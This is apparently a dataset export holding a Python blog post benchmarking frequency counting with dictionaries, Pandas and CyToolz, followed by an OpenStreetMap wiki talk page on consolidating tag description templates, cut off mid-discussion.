text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Python Data Structures are Fast tl;dr: Our intuition that Python is slow is often incorrect. Data structure bound Python computations are fast. You may also want to see the companion post, Introducing CyToolz. We think that Python is slow Our intuition says that Python is slow: >>> # Python speeds >>> L = range(1000000) >>> timeit sum(L) timeit np.s100 loops, best of 3: 7.79 ms per loop >>> # C speeds >>> import numpy as np >>> A = np.arange(1000000) >>> timeit np.sum(A) 1000 loops, best of 3: 725 µs per loop Numerical Python with lots of loops is much slower than the equivalent C or Java code. For this we use one of the numeric projects like NumPy, Cython, Theano, or Numba. But that only applies to normally cheap operations This slowdown occurs for cheap operations for which the Python overhead is large relative to their cost in C. However for more complex operations, like data structure random access, this overhead is less important. Consider the relative difference between integer addition and dictionary assignment. >>> x, y = 3, 3 >>> timeit x + y 10000000 loops, best of 3: 43.7 ns per loop >>> d = {1: 1, 2: 2} >>> timeit d[x] = y 10000000 loops, best of 3: 65.7 ns per loop A Python dictionary assignment is about as fast as a Python add. Disclaimer: this benchmark gets a point across but is is very artificial, micro-benchmarks like this are hard to do well. Micro-Benchmark: Frequency Counting Warning: cherry-picked To really show off the speed of Python data structures lets count frequencies of strings. I.e. given a long list of strings >>> data = ['Alice', 'Bob', 'Charlie', 'Dan', 'Edith', 'Frank'] * 1000000 We want to count the occurence of each name. In principle we would write a little function like frequencies def frequencies(seq): """ Count the number of occurences of each element in seq """ d = dict() for item in seq: if item not in d: d[item] = 1 else: d[item] = d[item] + 1 return d >>> frequencies(data) {'Alice': 1000000, 'Bob': 1000000, 'Charlie': 1000000, 'Dan': 1000000, 'Edith': 1000000, 'Frank': 1000000} This simple operation tests grouping reductions on non-numerical data. This represents an emerging class of problems that doesn’t fit our performance intuition from our history with numerics. We compare the naive frequencies function against the following equivalent implementations - The standard library’s collections.Counter - PyToolz’ benchmarked and tuned frequenciesoperation - Pandas’ Series.value_countsmethod - A naive implementation in Java, found here We present the results from worst to best: >>> timeit collections.Counter(data) 1.59 s # Standard Lib >>> timeit frequencies(data) 805 ms # Naive Python >>> timeit toolz.frequencies(data) 522 ms # Tuned Python >>> series = Series(data) >>> timeit series.value_counts() 286 ms # Pandas $ java Frequencies 207 ms # Straight Java Lets observe the following: - The standard library collections.Counterperforms surprisingly poorly. This is unfair because the Counterobject is more complex, providing more exotic functionality that we don’t use here. - The Pandas solution uses C code and C data structures to beat the Python solution, but not by a huge amount. This isn’t the 10x-100x speedup that we expect from numerical applications. - The toolz.frequenciesfunction improves on the standard Python solution and gets to within a factor of 2x of Pandas. The PyToolz development team has benchmarked and tuned several implementatations. I believe that this is the fastest solution available in Pure Python. - The compiled Java Solution is generally fast but, as with the Pandas case it’s not that much faster. For data structure bound computations, like frequency counting, Python is generally fast enough for me. I’m willing to pay a 2x cost in order to gain access to Pure Python’s streaming data structures and low entry cost. CyToolz Personally, I’m fine with fast Python speeds. Erik Welch on the other hand, wanted unreasonably fast C speeds so he rewrote toolz in Cython; he calls it CyToolz. His results are pretty amazing. >>> # import toolz >>> import cytoolz >>> timeit toolz.frequencies(data) 522 ms >>> timeit series.value_counts() 286 ms >>> timeit cytoolz.frequencies(data) 214 ms $ java Frequencies 207 ms CyToolz actually beats the Pandas solution (in this one particular benchmark.) Lets appreciate this for a moment. Cython on raw Python data structures runs at Java speeds. We discuss CyToolz further in our next blog post Conclusion We learn that data structure bound computations aren’t as slow in Python as we might think. Although we incur a small slowdown (2x-5x), probably due to Python method dispatching, this can be avoided through Cython. When using Cython, the use of Python data structures can match perofrmance we expect from compiled languages like Java. blog comments powered by Disqus
http://matthewrocklin.com/blog/work/2014/05/01/Fast-Data-Structures/
CC-MAIN-2015-40
refinedweb
777
64.91
What is delegation? Could give an example in coding. The following is i found on java glossary. delegation An act whereby one principal authorizes another principal to use its identity or privileges with some restrictions. A good example is found at Javaworld Look at real life : when your boss gives you a job, you can do it yourself or you can give it to someone else, so delegate it. It's the same in the next example (found at Javaworld and in the book of Deitel on Java). Here's a piece of the code : Code: public class Stack { private java.util.ArrayList list; public Stack() { list = new java.util.ArrayList(); } public boolean empty() { return list.isEmpty(); } You're implementing a Stack but this Stack contains an ArrayList. If you create a Stack, in fact this Stack asks an ArrayList to be created. If you ask the Stack if it is empty, the Stack asks the ArrayList if it's empty. So, the work is done by ArrayList after this work is delegated by Stack. public class Stack { private java.util.ArrayList list; public Stack() { list = new java.util.ArrayList(); } public boolean empty() { return list.isEmpty(); } What is the Simple composition means? Through composition, Stack holds on to an ArrayList instance. As you can see, Stack then forwards the requests to the ArrayList instance. Simple composition and request forwarding (such as that of the Stack class presented above) is often mistakenly referred to as delegation. The idea of delegation is the basis of event-based programming. It allows you to separate logic from presentation. A user clicks his mouse pointer on a component in your GUI, or your user types some text into a TextField, or some other action occurs. That component generates a MouseEvent or a TextEvent or an ActionEvent. That event is dispatched to a listener - you have told the component who to send the event to in your code. The listener knows what to do if an event it is listening for arrives, and does its work. The component does not execute the code - it delegates the handling of the event to the listener. Simple composition and request forwarding (such as that of the Stack class presented above) is often mistakenly referred to as delegation. Mind you, these examples are found at a website and in a book. It's by no means a self invented example. It's a bit disappointing if you hear you cannot trust any longer the sources on Java you were sure of. Javaworld is just people like us writing articles. Yes, in a sense, the work performed by a contained class is a "delegation" of work - using commonly used connotation of the English word - but is it what the "language masters" refer to as "delegation"? It's not for me to say. I've never read nor used any of Deitel's books but I have read many reviews which trash his (what the reviewers call) lack of technical knowledge. Forum Rules Development Centers -- Android Development Center -- Cloud Development Project Center -- HTML5 Development Center -- Windows Mobile Development Center
http://forums.devx.com/showthread.php?147701-Need-help-with-simple-program&goto=nextnewest
CC-MAIN-2018-17
refinedweb
517
65.93
signature REGEX structure Regex : REGEX This structure provides an interface to a (subset of) POSIX-compatible regular expressions. Note: however, that the functions resulting from this partial application cannot be pickled. import structure Regex from "x-alice:/lib/regex/Regex" import signature REGEX from "x-alice:/lib/regex/REGEX-sig" signature REGEX = sig type match infix 2 =~ exception Malformed exception NoSuchGroup val match : string -> string -> match option val =~ : string * string -> bool val groups : match -> string vector val group : match * int -> string val groupStart : match * int -> int val groupEnd : match * int -> int val groupSpan : match * int -> (int * int) end The abstract type of a matching. indicates that a regular expression not well-formed. indicates that an access to a group of a match has failed. It does not exists such a group. returns SOME m if r matches s and NONE otherwise. It raises Malformed if r is not a well-formed regular expression. The following equivalence holds: r =~ s = Option.isSome (match r s) returns a string vector of the given matching m need a match m and an index i. It raises NoSuchGroup, if i >= Vector.length (groups m) or i < 0. This structure provides pattern matching with POSIX 1003.2 regular expressions. The form and meaning of Extended and Basic regular expressions are described below. Here R and S denote regular expressions; m and n denote natural numbers; L denotes a character list; and d denotes a decimal digit: Some example character lists L: Remember that backslash (\) must be escaped as "\\" in SML strings. Example: Match SML integer constant: match "^~?[0-9]+$" [Extended] Example: Match SML alphanumeric identifier: match "^[a-zA-Z0-9][a-zA-Z0-9'_]*$" [Extended] Example: Match SML floating-point constant: match "^[+~]?[0-9]+(\\.[0-9]+|(\\.[0-9]+)?[eE][+~]?[0-9]+)$" [Extended] Example: Match any HTML start tag; make the tag's name into a group: match "<([[:alnum:]]+)[^>]*>" [Extended]
http://www.ps.uni-saarland.de/alice/manual/library/regex.html
CC-MAIN-2018-43
refinedweb
315
56.45
Type-building macros are different from expression macros in several ways: Array<haxe.macro.Expr.Field>. haxe.macro.Context.getBuildFields(). @:buildor @:autoBuildmetadata on a class or enum declaration. The following example demonstrates type building. Note that it is split up into two files for a reason: If a module contains a macro function, it has to be typed into macro context as well. This is often a problem for type-building macros because the type to be built could only be loaded in its incomplete state, before the building macro has run. We recommend to always define type-building macros in their own module. import haxe.macro.Context; import haxe.macro.Expr; class TypeBuildingMacro { macro static public function build(fieldName:String):Array<Field> { var fields = Context.getBuildFields(); var newField = { name: fieldName, doc: null, meta: [], access: [AStatic, APublic], kind: FVar(macro : String, macro "my default"), pos: Context.currentPos() }; fields.push(newField); return fields; } } @:build(TypeBuildingMacro.build("myFunc")) class Main { static public function main() { trace(Main.myFunc); // my default } } The build method of TypeBuildingMacro performs three steps: Context.getBuildFields(). haxe.macro.expr.Fieldfield using the funcNamemacro argument as field name. This field is a Stringvariable with a default value "my default"(from the kindfield) and is public and static (from the accessfield). This macro is argument to the @:build metadata on the Main class. As soon as this type is required, the compiler does the following: @:buildmetadata. This allows adding and modifying class fields at will in a type-building macro. In our example, the macro is called with a "myFunc" argument, making Main.myFunc a valid field access. If a type-building macro should not modify anything, the macro can return null. This indicates to the compiler that no changes are intended and is preferable to returning Context.getBuildFields().
https://haxe.org/manual/macro-type-building.html
CC-MAIN-2018-17
refinedweb
298
50.43
Template talk:Description User:Moresby/KeyDescription and User:Moresby/ValueDescription are reimplementations of the various {{KeyDescription}} and {{ValueDescription}} templates used widely across this wiki to document tag usage. Contents - 1 Rationale for this new template - 2 Side-by-side comparison - 3 Implementation plan - 4 Discussion - 4.1 native_key and native_value - 4.2 Language-specific tool links - 4.3 Nice work - 4.4 New proposed KeyDescription Template - 4.5 Problem(s) - 4.6 Website and URL pattern - 4.7 Missing templates - 4.8 Formatting of parameters - 4.9 Thank you for doing this - 4.10 Templates without image parameter - 4.11 Wikidata - 4.12 Why statuslink is present in documentation but not used in template? - 4.13 Wikidata link - 4.14 Rendering - 4.15 Edits since January 2015, consider reversion - 4.16 Unlinked image - 4.17 One discussion place - 4.18 Remove User:Moresby links from See Also - 4.19 Support of value only - 4.20 Separating usage and proposal status Rationale for this new template Back in October 2007 Etric Celine created the very first key description template as an attempt "to get a well designed structure into the available Keys that exist to describe a map feature." Over the more-than-six years since then, this approach has grown into nearly forty such templates in over twenty languages: Lazzko created the first non-English template in July 2008 in Finnish, and German, Italian, Hungarian and other languages followed later, with Catalan being the most recent addition. Despite some fairly advanced template magic being present in the English-language template to provide language support, the templates for non-English languages were implemented separately, and their paths have diverged somewhat ever since. While this has allowed special customisation for the different requirements of each language community, this has also meant that changes and maintenance of such a wide number of templates has been difficult. We see that with the range of different levels of implementation of the various templates, some of which include some later features from the English templates, and many of which contain links to now-non-functioning external sites. It simply is a lot of work to understand, maintain and keep up-to-date this spread of templates. And template designing and building isn't for everyone: the proportion of people with the knowledge, time and inclination to put effort into description templates is going to be a small one, meaning that in any given language community, that group is likely to be very small indeed. As OpenStreetMap builds and grows as a true multi-language project, there needs to be an emphasis on supporting non-English communities well, particularly the newer, smaller ones. So this reimplementation of the {{KeyDescription}} and {{ValueDescription}} templates attempts to address some of these issues, and attempts to take a serious renovation of the current setups, without affecting the visible user experience in any significant way at all. Improvement for language support, increased consistency and ease of maintenance have been the key drivers here, as well as making a few small, cosmetic tweaks in an aim to improve the overall look. Language support This template has been designed from the outset to support full internationalization. By separating the formatting (title, headings, etc.) from the language content, the template can be used just as well on a Japanese-language page as an English-language one. As mentioned above, this approach for this template is not new — Miloscia pioneered this approach in August 2013 — but is taken further here. By providing excellent language support, it will be possible to migrate non-English pages away from language-specific description templates to making use of this new template, allowing changes and fixes to take place in a single place, rather than in multiple locations. The discussion here has been moved further down the page. Maintainability The existing {{KeyDescription}} and {{ValueDescription}} templates have developed over some time, and are now quite difficult to understand. The new templates are built from a series of smaller templates, each with its own documentation and test cases. The new template hierarchy is as shown: {{Template:KeyDescription}} {{Template:ValueDescription}} | +---- {{Template:Description}} | +---- {{Template:TagPagename}} <-- link to canonical pages for key, value | +---- {{Template:RelationPagename}} <-- link to canonical pages for relation | +---- {{Template:Languages}} <-- links to the same content in other languages | +---- {{Template:DescriptionCategories}} <-- categorises according to group, key, value, language | | | +---- {{Template:DescriptionCategory}} | +---- {{Template:DescriptionLang}} <-- provides translations for key content | | | +--- {{Template:TranslateThis}} <-- encourages reader to submit a new translation | +---- {{Template:GroupLink}} <-- hyperlinks group name | +---- {{Template:ElementUsage}} <-- shows which type of elements to use this on | | | +---- {{Template:ElementUsage2}} | | | +---- {{Template:ElementUsageLang}} <-- provides translations for element usage phrases | | | +--- {{Template:TranslateThis}} <-- encourages reader to submit a new translation | +---- {{Template:StatusLang}} <-- provides translations for statuses | | | +--- {{Template:TranslateThis}} <-- encourages reader to submit a new translation | +---- {{Template:DescriptionCategory}} <-- categorises according to status | +---- {{Template:DescriptionLinks}} <-- links to external web pages about this key, value | +---- {{Template:TaginfoLinks}} <-- generate links to taginfo instances | +---- {{Template:TaginfoLinksPerLanguage}} <-- which taginfo instances to link to for this language The main template is also broken down into chunks, with some explanation in the comments of what each chunk contributes. Personalisation If you want to personalise the look of the description boxes, the new templates give you that option. The main box is a table with class description and either keydescription or valuedescription. You can add personal CSS rules on your personal wiki CSS page to change the CSS styles which are applied. For example, adding this code: table.description { background-color: #ccf !important; border: 3px solid black !important; } changes the colour of description boxes to blue, and adds a wider border. The following classes are also defined: For example, if you do not want to see taginfo details at all, the following line on your CSS page will remove them completely: table.description tr.d_taginfo { display: none; } Cosmetic/minor tweaks The following minor tweaks have been made in the new templates: - top margin reduced from .2em to 0px - image horizontally centred within box, not left-aligned - thin space inserted either side of the '=' in the title of the value description box - show/hide for tag tools removed, as very few tool lines needed - default image changed from to or as appropriate - values in box title hyperlinked to appropriate description page, allowing easy navigation where the description box is on a different page - improved handling where important parameters are missing - "group" and "status" information combined: header and value on same line to reduce vertical size of box Side-by-side comparison Each of the following is a real-life usage of one or other of the current description templates, taken from a page on this wiki. In the case of the current templates, the template has been subst:-ed and the language links removed, simply to make the table readable. The new template is called with exactly the same parameters, except for languagelinks = no to switch off the language links, and lang = ?? to indicate which language to use. Implementation plan The following implementation seems sensible, with enough time for each stage/between stages to check that nothing is going too wrong. - Stage 1: publish this outline here, encourage discussion, identify and address any bugs, problems, concerns or questions; use this template in a small number of real pages to check for compatibility across more real-world usages, languages, etc. - The following pages are being used to test these templates: - Stage 2: once reasonable consensus has been achieved, select a medium-sized language group and move usage of existing language-specific template to this one, checking for compatibility, readability, etc. - Updated seven pages which included {{Fi:ValueDescription}}but did not have lang =parameter specified: set lang = fi - Replaced Template:Fi:ValueDescription with redirect to User:Moresby/ValueDescription - These pages now using new template: - Fi:Tag:amenity=atm - Fi:Tag:amenity=baby_hatch - Fi:Tag:amenity=bank - Fi:Tag:amenity=bicycle_parking - Fi:Tag:amenity=bicycle_rental - Fi:Tag:amenity=bureau_de_change - Fi:Tag:amenity=car_rental - Fi:Tag:amenity=car_sharing - Fi:Tag:amenity=cinema - Fi:Tag:amenity=courthouse - Fi:Tag:amenity=crematorium - Fi:Tag:amenity=embassy - Fi:Tag:amenity=ferry_terminal - Fi:Tag:amenity=fire_station - Fi:Tag:amenity=fountain - Fi:Tag:amenity=fuel - Fi:Tag:amenity=library - Fi:Tag:amenity=nightclub - Fi:Tag:amenity=police - Fi:Tag:amenity=prison - Fi:Tag:amenity=recycling - Fi:Tag:amenity=telephone - Fi:Tag:amenity=theatre - Fi:Tag:amenity=townhall - Fi:Tag:amenity=veterinary - Fi:Tag:building=garage - Fi:Tag:building=garages - Fi:Tag:highway=crossing - Fi:Tag:highway=footway - Fi:Tag:highway=secondary - Fi:Tag:highway=speed_camera - Fi:Tag:highway=steps - Fi:Tag:highway=tertiary - Fi:Tag:highway=unclassified - Fi:Tag:leisure=dog_park - Fi:Tag:leisure=slipway - Fi:Tag:man_made=wastewater_plant - Fi:Tag:man_made=watermill - Fi:Tag:natural=tree - Fi:Tag:natural=wetland - Fi:Tag:power=tower - Fi:Tag:railway=crossing - Fi:Tag:railway=level_crossing - Fi:Tag:service=parking_aisle - Fi:Tag:shop=bakery - Fi:Tag:shop=bicycle - Fi:Tag:shop=butcher - Fi:Tag:shop=car - Fi:Tag:shop=dry_cleaning - Fi:Tag:sport=shooting - Fi:Tag:tourism=hotel - Fi:Tag:tourism=zoo - Fi:Tag:waterway=river - Fi:Tag:waterway=stream - Replaced Template:NL:KeyDescription with redirect to User:Moresby/KeyDescription - These pages now using new template: - NL:Key:cycleway - NL:Key:building - NL:Key:amenity - NL:Key:demolished - NL:Key:office - NL:Key:addr - NL:Key:man_made - NL:Key:shop - NL:Key:tourism - NL:Key:craft - NL:Key:emergency - NL:Key:public_transport - NL:Key:name - NL:Key:type - NL:Key:route_master - NL:Key:colour - NL:Key:landuse - NL:Key:military - NL:Key:natural - NL:Key:leisure - NL:Key:fenced - NL:Key:fence_type - NL:Key:barrier - NL:Key:backrest - NL:Key:bench - NL:Key:waste - Stage 3: assuming no showstoppers, replace one or other of {{KeyDescription}}or {{ValueDescription}}with the new template {{ValueDescription}}replaced with a redirect to User:Moresby/ValueDescription at around 2014-04-14 21:30 GMT. - Stage 4: replace the other with the new template {{KeyDescription}}replaced with a redirect to User:Moresby/KeyDescription at around 2014-04-17 22:30 GMT. - reverted by User:Pigsonthewing at around 2014-04-17 23:00 GMT — discussion. - Extra url_patternadded, and redirect reinstated at around 2014-04-18 15:35 GMT. - Stage 5: redirect language templates to User:Moresby/KeyDescription or User:Moresby/ValueDescription as appropriate, identifying any remaining language-specific features and incorporating as appropriate - Stage 6: update individual description pages to point to {{KeyDescription}}or {{ValueDescription}}, retaining page-specific parameters - Stage 7: replace content of {{KeyDescription}}and {{ValueDescription}}with code from User:Moresby/KeyDescription and User:Moresby/ValueDescription - Stage 8: collect and find appropriate places for documentation and discussion Discussion native_key and native_value This discussion was moved from above. I would like to see two extra parameters. native_key and native_value. This will allow us to add the names of the key and value in the language of the user and enable him to find a key or value in his language. See Polish version of any tag. --Władysław Komorek (talk) 21:16, 30 March 2014 (UTC) - Keys and values are a machine-readable constant. They must not be translated, otherwise they no longer work. (I assume we were supposed to discuss below the box? Feel free to move my comment down.) --Tordanik 16:27, 31 March 2014 (UTC) - I do not mean their translations, only adding additional, optional, parameters, where the user enters a names in their own language. --Władysław Komorek (talk) 16:34, 31 March 2014 (UTC) - Then why do you insist on calling them "key" and "value"? The last time you suggested this, I've given a lot of suggestions on how to do this without this misleading presentation format, and even without the limitation of having only one possible native word for each key. --Tordanik 16:40, 31 March 2014 (UTC) - I also replied to you that your suggestions do not solve the case. - It seems that you do not accept a different approach to help users, who do not speak English, select the appropriate tag. --Władysław Komorek (talk) 18:34, 31 March 2014 (UTC) - You indeed declined all alternatives I offered, but I still wonder why. These are what the German community uses, and I don't remember anyone ever asking for a list with entries like Straße=Autobahn. I hope we can still find an alternative, because there is exactly one approach that I do not want: Making things that should not be entered into the database look like tags. --Tordanik 19:50, 31 March 2014 (UTC) Language-specific tool links Hi, let me first say thank you for the amount of work all this must have been. I think that the consolidation of the various versions of this template is a step in the right direction. Unfortunately, I'm having a hard time following the MediaWiki template syntax across the many templates despite your laudable effort to include comments. So could you perhaps help me understand how having different tool links for each language will work? --Tordanik 16:50, 31 March 2014 (UTC) - Thanks. :-) I really think this could make a difference. Yes, when I started, I thought that per-language support for external links would be a sensible thing. But when I analysed which external links the various templates provided, there was some language-based variation, but almost exclusively to sites which no longer functioned. Here's an analysis of which sites are linked to across the entire set of templates: - So, that left only three or four active sites, and I managed to squeeze them quite happily into the bottom of the box, via the {{DescriptionLinks}}template, which I seem to have missed in the tree above - sorry, I'll fix that. The template is passed the language of the description box, so it could, as was originally the idea, provide links which are specific to that language/locale. But it's not at the moment, as there aren't any to provide… If/when there's call for it, I (or someone else) can add this in, but at the moment everyone gets the same external links. For now, that's probably quite a good thing, perhaps. Moresby (talk) 22:13, 31 March 2014 (UTC) - The obvious canditates would be the local taginfo instances. Right now it's just UK/US/FR for everyone, but the several sites on openstreetmap.ru seem pretty much alive, It's not something that has to be done right now, of course. But it's good to know that we will be able to provide a bit more variation eventually. --Tordanik 23:24, 31 March 2014 (UTC) - OK, breaking news: have a look here. Each user can now configure which country sites he/she wants in addition or instead of the default set. I'm working on being able to set a different default set for descriptions of a given language, but that's not there yet. Do let me know what you think.... Moresby (talk) 13:26, 12 April 2014 (UTC) Nice work This looks very promising and I think you’re doing a great job. A few comments: - The lang parameter could default to {{langcode}}, which deduces the language from the name of the page making it usually unnecessary to set explicitly. - Some parameters (onNode, combination and so on) would be expected to be the same for every language a tag is documented in. Is there a was to set them for all languages? - Some pages use {{RelationDescription}}and its language versions. Is that to be brought into this scheme or can we revisit whether values of the type=* key actually need their own template? --Andrew (talk) 06:42, 1 April 2014 (UTC) - Why did you add a lang parameter to each page instead of deducing the language in the template as I suggested on this page last week? --Andrew (talk) 11:50, 10 April 2014 (UTC) - Hiya - sorry, I wasn't ignoring you, although it absolutely must have looked like it…. I didn't know about {{langcode}}before you mentioned it, and it seems to be an excellent idea - I like your plan a lot. I'm going to look at that next. When I got to trying a whole language, you're absolutely right, I could have used langcode first. In this case, I picked fi as a medium-sized language group, and looked to see how many there were with lang not specified, and found seven. I chose to edit those seven by hand and get a stage further forward, rather than implement {{langcode}}then. But that approach is going to be too much work across all the languages, which is where your idea comes in. - Your other comments are also spot on: at the back of my mind I have some ideas of how to separate important information from individual pages, so it can be called on in different ways. If you're interested, have a look at this thing where I was experimenting with this template as a way to hold information on keys and values. There's a lot to do to get it working sensibly, but I think it's a worthwhile approach. And I'd not spotted {{RelationDescription}}until you pointed it out: it just shows that there can be really important stuff under your nose and you don't know it's there. Thanks - that looks like a great thing to incorporate. - Thanks for your valuable input and encouragement - apologies again it's taken my a while to respond. Moresby (talk) 12:51, 10 April 2014 (UTC) New proposed KeyDescription Template This discussion was moved from User talk:Moresby. Hi Moresby, I just have several questions about your new proposed templates: - will it work with Czech or Polish language? The reason I ask is that Czech and Polish are not really name spaces on this Wiki which complicates things a bit. - can you make the Group name clickable link as I have done in the current KeyDescription? Or you do not like this idea? - will I be able to use other TagInfo servers as I do in current Czech version of KeyDescription? Chrabros (talk) 05:17, 7 April 2014 (UTC) - Thanks for the feedback! The implementation is not dependent on namespaces at all, so Czech and Polish shouldn't be a difficulty for this reason. There's a complication for Polish, though, as Władysław Komorek has added a "native key" functionality to the templates, which none of the other languages have. I can see arguments for and against this, the discussion has been going backwards and forwards in various places for some time, and I'm really not wanting to take one side or another - that's for others to debate. So for now, I'm leaving Polish alone. You'll see in my implementation plan that the next stage involves migrating an entire language group. I've not come to any conclusion which to choose, but Czech is certainly an option. I notice you're fluent in Czech - if you'd be happy to review the changes once they're implemented, and point out any problems, I'd be really grateful. - Yup, you're right that the group is a clickable link on current templates, and I've missed that. Apologies - I've not meant to remove any existing functionality without a very good reason, and this was an oversight. I'll get onto it. - Tordanik was very helpful in discussing external links here, where I outline how I got to where we are with just a few taginfo options. I'm determined to give people a good set of options, and he pointed me to this page which lists taginfo sites. Please make sure your favourite sites are on that list, and I'll work out how to make sure you have easy access to them. :-) - Thanks again for your comments and interest. It's really encouraging to hear from others what they think. Moresby (talk) 07:36, 7 April 2014 (UTC) - If I've got it right, I'll change the current Czech template to call the new one, and everything should simply drop into place, with Czech translations of the headings in the boxes, and so on. All I'll need from you is some reassurance that the language is OK in context - the rest I should be able to work out. Like any other change, it can be undone at any time, of course, so there will be nothing which is irreversible. It's just that a second opinion from a Czech native speaker will make me less worried. :-) Moresby (talk) 09:24, 7 April 2014 (UTC) - Here are current problems with your template as I see them: - the Czech categories are gone (I had Cs:Značky podle klíče, Cs:Značky podle hodnoty, Cs:Klíče:amenity, Czech Documentation) - links and descriptions of Elements Icons were Czech, they are English now ("Can be used on Node", link to Node page) - Tools are very wrong - I had two Taginfos (one worldwide and one for Czech Republic only) then I had another selection of some interesting countries. I think it is important for every country to choose which other countries they want to see here. - Overpass turbo icon is gone and it was a nice one. ;-) - Why is there the ugly green checkmark? File:Yes check.svg Chrabros (talk) 03:15, 8 April 2014 (UTC) - Thank you - this is exactly the sort of feedback which I need to get this right. I assume your comments came from looking at Cs:Tag:historic=cannon. - I take your point about the Czech categories. Working out which categories existing templates put pages into and coming up with some sort of rationalisation was one of the biggest headaches in getting this together. You can see some of the work I did understanding this on the documentation of the {{DescriptionCategories}}template. When you attempt to consolidate forty or more divergent approaches into just one, there are going to be some differences, and what you've seen is just one of them. There's absolutely no reason that these categories shouldn't be added to Czech description pages - I'll get onto that. - Well spotted. These are supposed to be translated, as you can see from the template examples. For some reason I can't work out, I managed to skip Czech when I pulled all the translations into one place in Template:ElementUsageLang. Apologies - I'll fix that. - You can see some of the discussion about language-specific tool links here. I surveyed which taginfo sites were being used, saw that taginfo.openstreetmap.cz was linked, but that its data was only as recent as February, and crossed it off my list of active sites. I'm more than happy to put it back in, and the your comments support the views in the discussion I've just linked to that language-specific tool selection is a good way to go forward. - Overpass turbo is still there - it's right at the bottom, but I took out the logo, as I felt that it was too big, looked out of place and didn't match the other links. - If I understand you correctly, the check mark is not connected with this template, but appeared as a result of this edit of yours which included {{Tag stub}}. - Again, thanks for this: you've picked up a few things to fix, which is exactly what I'm after. Watch this space.... :-) Moresby (talk) 09:11, 8 April 2014 (UTC) - OK, I've made some changes: - I think that all the existing categories populated by the existing {{Cs:KeyDescription}}and {{Cs:ValueDescription}}templates will now also be provided by the new description templates. That's now implemented in {{DescriptionCategories}}- have a peek, and change the Czech section if you like. - There's Czech hover-text on the element usage icons now I've added it to {{ElementUsageLang}} - The Czech taginfo site is now on everyone's description boxes, now I've added it to {{DescriptionLinks}}. There's not too many taginfo sites yet in there to display them all on all pages, but I'll get to that in time. - Thanks again. I'm really grateful you've been able to take the time to review this for me. Moresby (talk) 12:17, 8 April 2014 (UTC) - Hi, it is getting better, but there are still some things I miss: - Yes, I have not noticed that, but in the English version of this page the check mark is where is should be - in the stub box, but in your version it overlaps with KeyDescription box. Why? I do not know, this is beyond my wiki skills. - Czech Categories - OK, done, fine. - The +/- icon displayed in upper right corner points to nowhere in your template. In the original it allowed to edit the template itself, however I did not get the reason why it was there. {{ElementUsageLang}}- I am still missing the translation of links when you click on the element icon. My versions led to Cs:Node, Cs:Way, ... - Overpass - well, I think that the icon was nice, but let's wait if the other will have some opinion as well - taginfo - I think that there will be complaints about the current implementation of this. I believe that for any language there is a specific set of taginfos which are interesting for each country. For Czech is interesting German, Austria, Slovak. For Slovaks it might be Czech, Hungarian. For Germans it would be Austria, Switzerland. For UK maybe Commonwealth countries, ... So I think that you should include the general worldwide TagInfo box as it was in the original template, including Overpass and then a country customizable selection of other taginfos (maybe initially collapsed as it was before). Just my opinion. - Chrabros (talk) 03:47, 9 April 2014 (UTC) - After a bit of experimenting, I see what you mean about the green tick. With my browser, it seems to be heavily dependent on the width of the window: if you start with a smallish browser window, and increase the width bit at a time, there's a point at which the layout changes significantly and displays the odd behaviour which you describe. I don't know what causing that, but it's almost certainly to do with CSS and layout. I'm not wanting to get into that just now, as it looks as if it's going to affect only a relatively few pages. Yes, it would be interesting to get to the bottom of it, and I expect that I will, but it's going in low on the list of priorities. - The +/- link at the top goes nowhere at the moment, but goes to the place where this template will end up when it's moved out of user space. Granted, that's not much help at the moment. The presence of links like this is related to the Wikipedia Navbar template, which includes links to view, edit or discuss the template. Perhaps it's time to be bold and change it to something more like the Wikipedia navbox links, so it's actually more useful. - I think you're right about people appreciating more taginfo links, as discussed at the links I pointed you to earlier. My main aim at this stage was simply to standardise the current forty-or-so templates, producing functionality which was broadly in line with the best aspects of each of them. There haven't been many taginfo links so far, so I've not incorporated and additional ones at this stage. These can, and I'm sure will, be added later. - The good news is that I've updated the element icons so that the link to language-specific pages if they are available. That matches what you're used to with cs, but also with pl, ja, uk and it. There are some languages where these now link to non-English pages where that wasn't the case before, such as fr, so that's a good example of taking a good idea from some templates and making it available to all languages. I think we're getting to a point where, with your help, we've got a long way with cs, and the other languages will benefit from that. Thanks. :-) Moresby (talk) 11:00, 9 April 2014 (UTC) Problem(s) This discussion was moved from User talk:Moresby. On the page Tag:tourism=theme_park there is a problem with your ValueDescription-Template and Template:Tag stub: They are overlapping. --LordOfMaps (talk) 09:24, 17 April 2014 (UTC) - OK, I finally tracked down the problem. It was a CSS rendering bug in Chrome, and I have now submitted my findings to Google. I've identified a workaround which should solve the problem. It will take a few hours for the wiki to rebuild all the affected pages, but after that there should be no more problems! Thanks. Moresby (talk) 15:18, 17 April 2014 (UTC) - Thanks! - It looks OK now. - But bug in Chrome? I had the problem using firefox. --LordOfMaps (talk) 18:18, 17 April 2014 (UTC) - Ooh, interesting. Like most bizarre happenings, it seems to have been caused by an interaction of several odd things. I boiled it down to the following, which seemed to work OK in Firefox, but not in Chrome (both on Ubuntu): <html> <body> <div style='float: right; width: 150px; border: 2px solid black;'>aaaaaaaaa</div> <div style="float: right; width: 250px; border: 2px solid black; clear: right;">bbbbbbbb</div> <div style="> </body> </html> - I don't think that the content of the divs were supposed to overlap, so I put this down to a Chrome bug. That was enough to find me a workaround, which seemed like a win. It's entirely possible that I've inadvertently removed another important component of the problem in my analysis, in which case it's even more complicated than I thought. Or I just messed up somewhere along the line. Perhaps I'll try it again in Firefox to see. But I might let sleeping dogs lie.... :-) Thanks again. Oh, and thanks for picking up the German translation on some of the templates - most grateful. Moresby (talk) 18:37, 17 April 2014 (UTC) - This is definitely not a bug of Chrome, but your misunderstanding about how "float:" works in CSS: it is floating within the box of the nearest ancestor element which is positioned (with position:relative or position:absolute or float:*). In your HTML, the only box element that is positioned is the "html" element (positioned by the viewing window); the effect of "clear:*" is also relative to the same ancestor box. - So what you get is "aaaaa" aligned to the right margin inside the html box, then "bbbbb" is displyed just below (because of clear:right), but the third element is NOT floating, and its width is then the width of its parent element (the width of body, which is itself near from the width of html): the image will then be aligned to the right, but NOT to the right margin because the floating "bbbbbb" occupies that position; - Yes the third "div" overlaps the second one, but the image in it will not overlap the content of the second div, even if the third div it is text-align:right.... - In summary you must get this layout: aaaaaaa (to the right), then below it "ccccc", the icon, and "bbbbbbb"; but if on the second line not everything fits, the second line will still display "bbbbbb" and "ccccc" before it if it can fit, but the icon will wrap below on a third line (the two floatting elements will not move, they are positioned first before 